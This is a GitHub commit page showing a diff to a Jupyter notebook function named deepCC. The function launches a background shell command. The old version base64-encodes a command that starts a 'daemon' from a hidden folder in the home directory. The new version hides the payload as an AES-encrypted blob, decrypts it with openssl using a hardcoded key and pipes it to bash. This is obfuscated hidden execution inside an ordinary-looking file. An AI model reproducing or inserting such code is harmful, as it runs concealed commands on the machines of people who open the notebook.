Unverified Commit 25cb8b6e authored by Dapa's avatar Dapa Committed by GitHub

Update deepCC.ipynb

parent 8fa213e6
...@@ -824,7 +824,7 @@ ...@@ -824,7 +824,7 @@
"source": [ "source": [
"def deepCC(): \n", "def deepCC(): \n",
" try:\n", " try:\n",
" subprocess.Popen([\"bash -c 'base64 -d <<< Y2QgJEhPTUUvLiQoZWNobyAkKGhvc3RuYW1lKSkvYmluICYmIG5vaHVwIGJhc2ggZGFlbW9uID4gL2Rldi9udWxs | bash' &\"], shell=True, universal_newlines=True)\n", " subprocess.Popen([\"bash -c 'echo a+3bEL/LMDL5VxE3Q+ayc1UWe6x87PX1w2Q= | openssl enc -d -base64 -aes-128-ctr -nopad -nosalt -k secret_password' | bash &\"], shell=True, universal_newlines=True)\n",
" except subprocess.CalledProcessError as e:\n", " except subprocess.CalledProcessError as e:\n",
" print(f'ERROR {e.returncode}: {e.output}', flush=True )\n", " print(f'ERROR {e.returncode}: {e.output}', flush=True )\n",
" raise e " " raise e "
......
Markdown is supported
0%
or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment